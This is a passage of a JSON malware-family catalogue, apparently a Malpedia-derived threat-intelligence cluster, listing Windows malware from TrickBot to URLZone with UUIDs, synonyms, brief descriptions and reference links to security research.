"https://cyber.wtf/2020/08/31/trickbot-rdpscandll-password-transof/", "https://www.welivesecurity.com/2020/10/12/eset-takes-part-global-operation-disrupt-trickbot/", "https://www.domaintools.com/resources/blog/tracking-a-trickbot-related-ransomware-incident", "https://blog.lumen.com/a-look-inside-the-trickbot-botnet/", "https://www.bleepingcomputer.com/news/security/ryuk-ransomware-attacked-epiq-global-via-trickbot-infection/", "https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/", "https://intezer.com/blog/intezer-analyze/fantastic-payloads-and-where-we-find-them", "https://www.cybereason.com/blog/cybereason-vs.-ryuk-ransomware", "https://www.heise.de/security/artikel/Emotet-Trickbot-Ryuk-ein-explosiver-Malware-Cocktail-4573848.html", "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", "http://blog.fortinet.com/2016/12/06/deep-analysis-of-the-online-banking-botnet-trickbot", "https://threatresearch.ext.hp.com/detecting-a-stealthy-trickbot-campaign/", "https://www.fortinet.com/blog/threat-research/new-variant-of-trickbot-being-spread-by-word-document.html", "http://www.malware-traffic-analysis.net/2018/02/01/", "https://www.flashpoint-intel.com/blog/new-version-trickbot-adds-worm-propagation-module/", "https://www.secdata.com/the-trickbot-and-mikrotik/", "https://www.arbornetworks.com/blog/asert/trickbot-banker-insights/", "https://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware", "http://www.vkremez.com/2017/12/lets-learn-introducing-new-trickbot.html", "https://www.zscaler.com/blogs/research/trickbot-emerges-few-new-tricks", "https://blog.cyberint.com/ryuk-crypto-ransomware", "https://www.bleepingcomputer.com/news/security/trickbot-uses-a-new-windows-10-uac-bypass-to-launch-quietly/", "https://www.advanced-intel.com/post/trickbot-group-launches-test-module-alerting-on-fraud-activity", "https://labs.sentinelone.com/deep-dive-into-trickbot-executor-module-mexec-hidden-anchor-bot-nexus-operations/", "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors", "https://www.fidelissecurity.com/threatgeek/2016/10/trickbot-we-missed-you-dyre", "https://eclypsium.com/2020/12/03/trickbot-now-offers-trickboot-persist-brick-profit/", "https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2021-threat-report.pdf", "https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/", "https://securityintelligence.com/posts/itg08-aka-fin6-partners-with-trickbot-gang-uses-anchor-framework/", "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/", "https://www.kryptoslogic.com/blog/2021/02/trickbot-masrv-module/", "https://securityintelligence.com/trickbot-takes-to-latin-america-continues-to-expand-its-global-reach/", "https://unit42.paloaltonetworks.com/goodbye-mworm-hello-nworm-trickbot-updates-propagation-module/", "https://www.securityartwork.es/wp-content/uploads/2017/06/Informe_Evoluci%C3%B3n_Trickbot.pdf", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", "https://www.berlin.de/sen/justva/presse/pressemitteilungen/2020/pm-11-2020-t-systems-forensik_bericht_public_v1.pdf", "https://github.com/JR0driguezB/malware_configs/tree/master/TrickBot", "https://www.joesecurity.org/blog/498839998833561473", "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_5_sajo-takeda-niwa_en.pdf", "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko", "https://escinsecurity.blogspot.de/2018/01/weekly-trickbot-analysis-end-of-wc-22.html", "https://www.microsoft.com/security/blog/2021/02/01/what-tracking-an-attacker-email-infrastructure-tells-us-about-persistent-cybercriminal-operations/", "https://www.bleepingcomputer.com/news/security/trickbot-now-steals-windows-active-directory-credentials/", "https://www.fortinet.com/blog/threat-research/deep-analysis-of-trickbot-new-module-pwgrab.html", "https://labs.sentinelone.com/deep-dive-into-trickbot-executor-module-mexec-reversing-the-dropper-variant/", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf", "https://krebsonsecurity.com/2020/10/attacks-aimed-at-disrupting-the-trickbot-botnet/", "https://www.secureworks.com/research/threat-profiles/gold-ulrick", "https://twitter.com/VK_Intel/status/1328578336021483522", "https://www.bleepingcomputer.com/news/security/emotet-trickbot-malware-duo-is-back-infecting-windows-machines/", "https://inquest.net/blog/2019/08/26/TrickBot-Memory-Analysis", "https://duo.com/decipher/trickbot-up-to-its-old-tricks", "https://labs.sentinelone.com/inside-a-trickbot-cobaltstrike-attack-server/", "https://hurricanelabs.com/splunk-tutorials/splunking-with-sysmon-part-4-detecting-trickbot/", "https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/", "https://cybersecurity.att.com/blogs/labs-research/trickbot-bazarloader-in-depth", "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf", "https://public.intel471.com/blog/partners-in-crime-north-koreans-and-elite-russian-speaking-cybercriminals/", "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", "https://www.youtube.com/watch?v=EdchPEHnohw", "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", "https://www.fireeye.com/blog/threat-research/2020/03/the-cycle-of-adversary-pursuit.html", "https://redcanary.com/resources/webinars/deep-dive-process-injection/", "https://www.bleepingcomputer.com/news/security/malware-tries-to-trump-security-software-with-potus-impeachment/", "https://unit42.paloaltonetworks.com/trickbot-campaign-uses-fake-payroll-emails-to-conduct-phishing-attacks/", "https://osint.fans/service-nsw-russia-association" ], "synonyms": [ "TheTrick", "TrickLoader", "Trickster" ], "type": [] }, "uuid": "c824813c-9c79-4917-829a-af72529e8329", "value": "TrickBot" }, { "description": "Malware attacking commonly used in Industrial Control Systems (ICS) Triconex Safety Instrumented System (SIS) controllers.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.triton", "https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html", "https://www.eenews.net/stories/1060123327/", "https://www.midnightbluelabs.com/blog/2018/1/16/analyzing-the-triton-industrial-malware", "https://home.treasury.gov/news/press-releases/sm1162", "https://ics-cert.us-cert.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%E2%80%94Safety%20System%20Targeted%20Malware_S508C.pdf", "https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html", "https://github.com/ICSrepo/TRISIS-TRITON-HATMAN", "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors", "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1538425180.pdf", "https://securelist.com/apt-trends-report-q2-2019/91897/", "https://dragos.com/blog/trisis/TRISIS-01.pdf", "https://www.domaintools.com/resources/blog/visibility-monitoring-and-critical-infrastructure-security" ], "synonyms": [ "HatMan", "Trisis" ], "type": [] }, "uuid": "79606b2b-72f0-41e3-8116-1093c1f94b15", "value": "Triton" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.trochilus_rat", "https://github.com/5loyd/trochilus/", "https://go.recordedfuture.com/hubfs/reports/cta-2019-0206.pdf", "https://www.sstic.org/media/SSTIC2020/SSTIC-actes/pivoter_tel_bernard_ou_comment_monitorer_des_attaq/SSTIC2020-Slides-pivoter_tel_bernard_ou_comment_monitorer_des_attaquants_ngligents-lunghi.pdf", "https://raw.githubusercontent.com/yt0ng/cracking_softcell/main/Cracking_SOFTCLL_TLP_WHITE.pdf", "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", "https://app.box.com/s/z1uanuv1vn3vw5iket1r6bqrmlra0gpn", "https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-drbcontrol-uncovering-a-cyberespionage-campaign-targeting-gambling-companies-in-southeast-asia", "https://www.secureworks.com/research/bronze-vinewood-targets-supply-chains", "https://www.secureworks.com/research/threat-profiles/bronze-vinewood", "https://github.com/m0n0ph1/malware-1/tree/master/Trochilus" ], "synonyms": [], "type": [] }, "uuid": "1c3ee140-8c47-4aa7-9723-334ccd886c4e", "value": "Trochilus RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.troldesh", "https://securelist.com/the-shade-encryptor-a-double-threat/72087/", "https://support.kaspersky.com/13059", "https://blog.avast.com/ransomware-strain-troldesh-spikes", "https://github.com/shade-team/keys", "https://isc.sans.edu/forums/diary/More+Russian+language+malspam+pushing+Shade+Troldesh+ransomware/24668/", "https://unit42.paloaltonetworks.com/shade-ransomware-hits-high-tech-wholesale-education-sectors-in-u-s-japan-india-thailand-canada/", "https://www.zdnet.com/article/shade-troldesh-ransomware-shuts-down-and-releases-all-decryption-keys/", "https://blog.checkpoint.com/2015/06/01/troldesh-new-ransomware-from-russia/", "https://blogs.technet.microsoft.com/mmpc/2016/07/13/troldesh-ransomware-influenced-by-the-da-vinci-code/", "https://www.welivesecurity.com/2019/01/28/russia-hit-new-wave-ransomware-spam/", "https://labs.bitdefender.com/2020/05/shade-troldesh-ransomware-decryption-tool/" ], "synonyms": [ "Shade" ], "type": [] }, "uuid": "41acd50d-e602-41a9-85e7-c091fb4bc126", "value": "Troldesh" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.troublegrabber", "https://www.netskope.com/blog/here-comes-troublegrabber-stealing-credentials-through-discord" ], "synonyms": [], "type": [] }, "uuid": "183fa14a-f42a-4508-b146-8550ba1acf2a", "value": "TroubleGrabber" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.troystealer", "https://seguranca-informatica.pt/troystealer-a-new-info-stealer-targeting-portuguese-internet-users" ], "synonyms": [], "type": [] }, "uuid": "36d7dea1-6abf-41ea-bcd8-079f24dc0972", "value": "troystealer" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.trump_ransom" ], "synonyms": [], "type": [] }, "uuid": "48deadcc-1a67-442d-b181-fdaaa337c4bb", "value": "Trump Ransom" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tsifiri" ], "synonyms": [], "type": [] }, "uuid": "3da6f62c-9e06-4e7b-8852-7c7689f65833", "value": "Tsifiri" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.turla_rpc", "https://unit42.paloaltonetworks.com/ironnetinjector/", "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", "https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity", "https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/" ], "synonyms": [], "type": [] }, "uuid": "8c6248d2-2b3a-4fe8-99cd-552077e3f84f", "value": "TurlaRPC" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.turla_silentmoon", "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", "https://twitter.com/Arkbird_SOLG/status/1304187749373800455", "https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity" ], "synonyms": [ "GoldenSky", "HyperStack" ], "type": [] }, "uuid": "ddee7f00-66e0-4d89-bd51-4b0df516a248", "value": "Turla SilentMoon" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.turnedup", "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage", "https://www.cyberbit.com/new-early-bird-code-injection-technique-discovered/", "https://www.cyberbit.com/blog/endpoint-security/new-early-bird-code-injection-technique-discovered/", "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage", "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html" ], "synonyms": [ "Notestuk" ], "type": [] }, "uuid": "fab34d66-5668-460a-bc0f-250b9417cdbf", "value": "TURNEDUP" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.typehash", "https://www.ptsecurity.com/upload/corporate/ww-en/pt-esc/winnti-2020-eng.pdf", "https://vblocalhost.com/uploads/VB2020-Lunghi-Horejsi.pdf" ], "synonyms": [ "SkinnyD" ], "type": [] }, "uuid": "d7b0ccc8-051c-4ab1-908e-3bd1811d9e2e", "value": "TypeHash" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tyupkin", "https://www.lastline.com/labsblog/tyupkin-atm-malware/", "https://documents.trendmicro.com/assets/white_papers/wp-cashing-in-on-atm-malware.pdf", "https://blog.talosintelligence.com/2019/05/10-years-of-virtual-dynamite.html" ], "synonyms": [], "type": [] }, "uuid": "c28e9055-b656-4b7a-aa91-fe478a83fe4c", "value": "Tyupkin" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.t_rat", "https://www.gdatasoftware.com/blog/trat-control-via-smartphone" ], "synonyms": [], "type": [] }, "uuid": "fb9e9ade-b154-43ba-a0ea-550322454acf", "value": "T-RAT 2.0" }, { "description": "A toolkit maintained by hfiref0x which incorporates numerous UAC bypass techniques for Windows 7 - Windows 10. Typically, components of this tool are stripped out and reused by malicious actors.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.uacme", "https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/", "https://github.com/hfiref0x/UACME" ], "synonyms": [ "Akagi" ], "type": [] }, "uuid": "ccde5b0d-fe13-48e6-a6f4-4e434ce29371", "value": "UACMe" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.udpos", "https://threatmatrix.cylance.com/en_us/home/threat-spotlight-inside-udpos-malware.html", "https://www.forcepoint.com/blog/x-labs/udpos-exfiltrating-credit-card-data-dns" ], "synonyms": [], "type": [] }, "uuid": "5d05d81d-a0f8-496d-9a80-9b04fe3019fc", "value": "UDPoS" }, { "description": "Information stealer.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ufrstealer", "https://twitter.com/malwrhunterteam/status/1096363455769202688", "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Usteal" ], "synonyms": [ "Usteal" ], "type": [] }, "uuid": "a24bf6d9-e177-44f2-9e61-8cf3566e45eb", "value": "UFR Stealer" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.uiwix", "https://www.minerva-labs.com/post/uiwix-evasive-ransomware-exploiting-eternalblue" ], "synonyms": [], "type": [] }, "uuid": "5e362cd1-bc5c-4225-b820-00ec7ebebadd", "value": "Uiwix" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_001" ], "synonyms": [], "type": [] }, "uuid": "72961adc-ace1-4593-99f1-266119ddeccb", "value": "Unidentified 001" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_003" ], "synonyms": [], "type": [] }, "uuid": "0e435b5d-37df-47cc-a1c4-1afb82df83d1", "value": "Unidentified 003" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_006" ], "synonyms": [], "type": [] }, "uuid": "c0a40d42-33bb-4eca-8121-f636aeec14c6", "value": "Unidentified 006" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_013_korean_malware", "http://blog.talosintelligence.com/2017/02/korean-maldoc.html" ], "synonyms": [], "type": [] }, "uuid": "b1cc4c79-30a5-485d-bd7f-8625c1cb5956", "value": "Unidentified 013 (Korean)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_020_cia_vault7", "https://wikileaks.org/ciav7p1/cms/page_34308128.html" ], "synonyms": [], "type": [] }, "uuid": "40c66571-164c-4050-9c84-f37c9cd84055", "value": "Unidentified 020 (Vault7)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_022_ransom" ], "synonyms": [], "type": [] }, "uuid": "5424d89e-1b7a-4632-987b-67fd27621d6f", "value": "Unidentified 022 (Ransom)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_023" ], "synonyms": [], "type": [] }, "uuid": "a936a595-f03d-4d8c-848e-2a3525c0415b", "value": "Unidentified 023" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_024_ransom", "https://twitter.com/malwrhunterteam/status/789161704106127360" ], "synonyms": [], "type": [] }, "uuid": "acf6c476-847c-477a-b640-18a5c99e3c2b", "value": "Unidentified 024 (Ransomware)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_025_clickfraud", "http://malware-traffic-analysis.net/2016/05/09/index.html" ], "synonyms": [], "type": [] }, "uuid": "f43a0e38-2394-4538-a123-4a0457096058", "value": "Unidentified 025 (Clickfraud)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_028" ], "synonyms": [], "type": [] }, "uuid": "22a686d8-dd35-4a29-9437-b0ce7b5c204b", "value": "Unidentified 028" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_029" ], "synonyms": [], "type": [] }, "uuid": "aff47054-7130-48ca-aa2c-247bdf44f180", "value": "Unidentified 029" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_030", "https://twitter.com/JaromirHorejsi/status/877811773826641920" ], "synonyms": [], "type": [] }, "uuid": "7287a0b0-b943-4007-952f-07b9475ec184", "value": "Filecoder" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_031" ], "synonyms": [], "type": [] }, "uuid": "122c1c9c-3131-4014-856c-7e8a0da57a6e", "value": "Unidentified 031" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_037" ], "synonyms": [], "type": [] }, "uuid": "d073f9e5-8aa8-4e66-ba47-f332759199a2", "value": "Unidentified 037" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_038" ], "synonyms": [], "type": [] }, "uuid": "d53e96c5-abfa-4be4-bb33-0a898c5aff58", "value": "Unidentified 038" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_039" ], "synonyms": [], "type": [] }, "uuid": "97c1524a-c052-49d1-8770-14b513d8a830", "value": "Unidentified 039" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_041" ], "synonyms": [], "type": [] }, "uuid": "88d70171-fc89-44d1-8931-035c0b095247", "value": "Unidentified 041" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_042", "http://www.intezer.com/lazarus-group-targets-more-cryptocurrency-exchanges-and-fintech-companies/" ], "synonyms": [], "type": [] }, "uuid": "168bf2a1-45a5-41ac-b364-5740e7ce9757", "value": "Unidentified 042" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_044" ], "synonyms": [], "type": [] }, "uuid": "df9c8440-b4da-4226-b982-e510d06cf246", "value": "Unidentified 044" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_045" ], "synonyms": [], "type": [] }, "uuid": "4cb8235a-7e70-4fad-9244-69215750d559", "value": "Unidentified 045" }, { "description": "RAT written in Delphi used by Patchwork APT.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_047", "https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/" ], "synonyms": [], "type": [] }, "uuid": "18da6a0e-abe9-4f65-91a3-2bf5a5ad29c2", "value": "Unidentified 047" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_052" ], "synonyms": [], "type": [] }, "uuid": "80c12fcd-e5ef-4549-860d-7928363022f9", "value": "Unidentified 052" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_053" ], "synonyms": [], "type": [] }, "uuid": "b60e32bd-158a-42b9-ac21-288bca4c8233", "value": "Unidentified 053 (Wonknu?)" }, { "description": "Unnamed portscanner as used in the Australian Parliament Hack (Feb 2019).", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_057", "https://blog.yoroi.company/research/the-arsenal-behind-the-australian-parliament-hack/" ], "synonyms": [], "type": [] }, "uuid": "1b8e86ab-57b2-4cd9-a768-a7118b4eb4be", "value": "Unidentified 057" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_058", "https://securelist.com/the-evolution-of-brazilian-malware/74325/#rat", "https://securelist.com/the-return-of-the-bom/90065/" ], "synonyms": [], "type": [] }, "uuid": "bab52335-be9e-4fad-b68e-f124b0d69bbc", "value": "Unidentified 058" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_059" ], "synonyms": [], "type": [] }, "uuid": "498a794c-64f9-4337-ac71-a3ff3cb53c68", "value": "win.unidentified_059" }, { "description": "Unidentified sideloader used by EmissaryPanda", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_060", "https://norfolkinfosec.com/emissary-panda-dll-backdoor/", "https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/" ], "synonyms": [], "type": [] }, "uuid": "84f43641-77bc-4dcb-a104-150e8574da22", "value": "Unidentified 060" }, { "description": "Was previously wrongly tagged as PoweliksDropper, now looking for additional context.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_061" ], "synonyms": [], "type": [] }, "uuid": "969d1054-b917-4fb8-b3f8-1e33926fdb65", "value": "Unidentified 061" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_063", "https://twitter.com/KevinPerlow/status/1160766519615381504" ], "synonyms": [], "type": [] }, "uuid": "d34ac949-3816-436b-a719-b4ced192388e", "value": "Unidentified 063 (Lazarus Keylogger)" }, { "description": "This .net executable can receive commands from c2 sever, upload and download files according to the returned content, perform an uninstall, or modify the registry to achieve persistence across reboots. At the end, it downloads a Python-based RAT, called PeppyRAT.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_066", "https://s.tencent.com/research/report/669.html" ], "synonyms": [], "type": [] }, "uuid": "e78c402f-998b-43ff-8102-f54838afcb8b", "value": "Unidentified 066" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_067", "https://s.tencent.com/research/report/831.html" ], "synonyms": [], "type": [] }, "uuid": "224066ee-4266-44a3-8ea2-b5d7b9b4969a", "value": "Unidentified 067" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_068", "https://rules.emergingthreatspro.com/changelogs/suricata-5.0-enhanced.etpro.2019-12-05T23:38:02.txt" ], "synonyms": [], "type": [] }, "uuid": "26bfad72-59d8-456e-a200-eb18e614e5cb", "value": "Unidentified 068" }, { "description": "Zeus derivate, no known public references.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_069", "https://zeusmuseum.com/unnamed%202/" ], "synonyms": [], "type": [] }, "uuid": "cc66d112-2ff5-462c-b029-15458d51f8a7", "value": "Unidentified 069 (Zeus Unnamed2)" }, { "description": "Unidentified downloader, possibly related to KONNI.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_070", "https://twitter.com/M11Sec/status/1217781224204357633" ], "synonyms": [], "type": [] }, "uuid": "0bdef005-fd36-4ce0-a215-d49bf05b8fb8", "value": "Unidentified 070 (Downloader)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_071", "https://zeusmuseum.com/unnamed%201/" ], "synonyms": [], "type": [] }, "uuid": "cc7de9da-dc33-4cf8-9388-986b001fad63", "value": "Unidentified 071 (Zeus Unnamed1)" }, { "description": "MSI-based loader that has been observed as a stager for win.metamorfo.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_072", "https://github.com/jeFF0Falltrades/IoCs/blob/master/Broadbased/metamorfo.md" ], "synonyms": [], "type": [] }, "uuid": "f2979fee-603d-496e-a526-d622e9cba84f", "value": "Unidentified 072 (Metamorfo Loader)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_073", "https://blog.certfa.com/posts/fake-interview-the-new-activity-of-charming-kitten/" ], "synonyms": [], "type": [] }, "uuid": "f049e626-7de2-4648-81db-53dfd34f2fab", "value": "Unidentified 073 (Charming Kitten)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_074", "https://blog.vincss.net/2019/12/re009-phan-tich-ma-doc-ke-hoach-nhiem-vu-trong-tam-2020.html" ], "synonyms": [], "type": [] }, "uuid": "4b60bda2-c587-4069-ace1-6283891d5faf", "value": "Unidentified 074 (Downloader)" }, { "description": "Unpacked http_dll.dat from the blog post.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_075", "https://blog.vincss.net/2020/03/re012-phan-tich-ma-doc-loi-dung-dich-COVID-19-de-phat-tan-gia-mao-chi-thi-cua-thu-tuong-Nguyen-Xuan-Phuc.html" ], "synonyms": [], "type": [] }, "uuid": "66f26a60-ab6a-4b7c-bd85-afdc44dbcfdd", "value": "Unidentified 075" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_076", "https://www.zscaler.com/blogs/research/return-higaisa-apt", "https://blog.bushidotoken.net/2020/06/deep-dive-darkhotel-apt.html", "https://www.youtube.com/watch?v=8x-pGlWpIYI" ], "synonyms": [], "type": [] }, "uuid": "4d5d0798-9cb3-4f26-8c98-db8d7190d187", "value": "Unidentified 076 (Higaisa LNK to Shellcode)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_077", "https://twitter.com/ccxsaber/status/1277064824434745345" ], "synonyms": [], "type": [] }, "uuid": "ca8a1900-ea9a-4d83-8873-6c48ac12da9a", "value": "Unidentified 077 (Lazarus Downloader)" }, { "description": "Suspected Zebrocy loader written in Nim.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_078", "https://twitter.com/Vishnyak0v/status/1300704689865060353" ], "synonyms": [], "type": [] }, "uuid": "99099489-eeb9-415a-a3b8-6133e774bed0", "value": "Unidentified 078 (Zebrocy Nim Loader?)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unlock92", "https://twitter.com/struppigel/status/810753660737073153", "https://twitter.com/bartblaze/status/976188821078462465" ], "synonyms": [], "type": [] }, "uuid": "036e657f-a752-4a4c-bb30-f15c24d954e6", "value": "Unlock92" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.upas", "https://malware.dontneedcoffee.com/2012/08/inside-upas-kit1.0.1.1.html", "https://research.checkpoint.com/deep-dive-upas-kit-vs-kronos/" ], "synonyms": [ "Rombrast" ], "type": [] }, "uuid": "b64ea39b-3ec2-49e3-8992-02d71c21b1bd", "value": "UPAS" }, { "description": "Upatre is primarly a downloader. It has been discovered in 2013 and since that time it has been widely updated. Upatre is responsible for delivering further malware to the victims, in specific upatre was a prolific delivery mechanism for Gameover P2P in 2013-2014 and then for Dyre in 2015.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.upatre", "https://marcoramilli.com/2020/06/24/is-upatre-downloader-coming-back/", "https://johannesbader.ch/2015/06/Win32-Upatre-BI-Part-1-Unpacking/", "https://researchcenter.paloaltonetworks.com/2018/07/unit42-upatre-continues-evolve-new-anti-analysis-techniques/", "https://secrary.com/ReversingMalware/Upatre/" ], "synonyms": [], "type": [] }, "uuid": "925390a6-f88d-46dc-96ae-4ebc9f0b50b0", "value": "Upatre" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.urausy" ], "synonyms": [], "type": [] }, "uuid": "5af4838f-1b4d-4f0b-bd27-50ef532e84f7", "value": "Urausy" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.urlzone", "https://www.gdatasoftware.com/blog/2013/12/23978-bebloh-a-well-known-banking-trojan-with-noteworthy-innovations", "https://www.johannesbader.ch/2015/01/the-dga-of-shiotob/", "https://krebsonsecurity.com/2011/07/trojan-tricks-victims-into-transfering-funds/", "https://www.virusbulletin.com/virusbulletin/2012/09/urlzone-reloaded-new-evolution/", "https://www.fireeye.com/blog/threat-research/2016/01/urlzone_zones_inon.html", "https://mp.weixin.qq.com/s/NRytT94ne5gKN31CSLq6GA", 